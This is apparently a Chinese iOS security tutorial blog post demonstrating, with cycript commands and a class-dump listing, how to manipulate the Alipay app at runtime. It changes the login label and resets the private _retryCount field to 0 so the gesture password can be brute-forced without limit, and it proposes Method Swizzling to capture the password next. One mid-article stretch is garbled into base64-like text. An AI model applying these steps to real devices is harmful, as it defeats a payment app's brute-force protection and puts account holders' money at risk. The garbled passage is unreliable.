iOS安全攻防(七):Hack實戰——解除支付寶app手勢解鎖錯誤次數限制 – iPhone手機開發技術文章 iPhone軟體開發教學課程

Hack實戰——解除支付寶app手勢解鎖錯誤次數限制

之前僅僅介紹瞭工具的使用,本文將實踐一下如何利用 cycript 結合 class-dump 結果hack,還要犧牲一下支付寶app。

首先,老套路,取到手勢解鎖界面的View Controller:

cy# var app = [UIApplication sharedApplication]
@""
cy# var keyWindow = app.keyWindow
@"<UIWindow: 0x16591bd0; frame = (0 0; 320 568); gestureRecognizers = ; layer = >"
cy# var root = keyWindow.rootViewController
@""
cy# var visible = root.visibleViewController
@""

然後,對照class-dump-z結果,來分析 GestureUnlockViewController 有什麼利用價值 :

@interface GestureUnlockViewController : DTViewController  {
@private
	GestureHeadImageView* _headImageView;
	GestureTipLabel* _tipLabel;
	GestureInputView* _inputView;
	DTButton* _forgetButton;
	DTButton* _changeAccountButton;
	int _retryCount;
	UIView* _guideView;
	id _delegate;
}
@property(assign, nonatomic) __weak id delegate;
-(void).cxx_destruct;
-(BOOL)shouldAutorotateToInterfaceOrientation:(int)interfaceOrientation;
-(void)headClicked;
-(void)gestureInputView:(id)view didFinishWithPassword:(id)password;
-(void)gestureInputViewFirstEffectiveTouch:(id)touch;
-(void)alertView:(id)view clickedButtonAtIndex:(int)index;
-(void)actionChangeAccountToLogin;
-(void)actionResetPswBtnClick;
-(void)resetCurrentUser;
-(void)resetPsw;
-(void)viewWillDisappear:(BOOL)view;
-(void)notifyFaceToFacePayReceivedData:(id)facePayReceivedData;
-(void)viewWillAppear:(BOOL)view;
-(void)breakFirstRun;
-(BOOL)isFirstRun;
-(void)guideViewClicked:(id)clicked;
-(void)viewDidLoad;
-(void)viewWillLayoutSubviews;
@end

目測 _tipLabel 是寫賬戶名和提示操作的label,上篇文章我提到過:@private限制不瞭keyPath,現在我們來修改一下支付寶登錄頁的用戶名信息:

cy# [visible setValue:@"Test By yiyaaixuexi" forKeyPath:@"_tipLabel.text"]

vcD48cD7Wp7i2sabK1srGw9zC673iy/jT0LOiytS0zsr9z97WxqOswazQ+LTtNbTOvs3SqtbY0MK1x8K8oaM8YnIgLz7O0s/rveKz/dbYytS94sv4tM7K/bXEz97WxqOst6LP1sHLvMfCvL3iy/i0zsr9tcTA4NDNysdpbnSjrGludCBfcmV0cnlDb3VudCCjrNXi0ru148jDztK63LK7v6rQxKOs0vLOqs7Szt63qM2ouf1LVkPAtNDeuMTG5Na1wcuhozwvcD48cD61q8rHw7vT0LnYz7WjrM7Sv8nS1M2ouf3WuNXrt8POyqO6PC9wPjxwPjwvcD48cHJlIGNsYXNzPQ==”brush:java;”>cy# visible->_retryCount = 0
0

這樣我就能無限制的用程序暴力破解手勢密碼瞭,來計算一下有多少種可能呢?

這個數字對我來說有點大,可是對iPhone5的CPU來說就是小菜一碟瞭~

等一下,密碼格式是什麼呢?

-(void)gestureInputView:(id)view didFinishWithPassword:(id)password;

id類型的密碼,很嚴謹,又給hack帶來不少麻煩呀~

不過沒關系,我們可以利用 Method Swizzling 來打出password到底是什麼,不過呢,貌似可以再寫一篇新文章去介紹瞭……

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。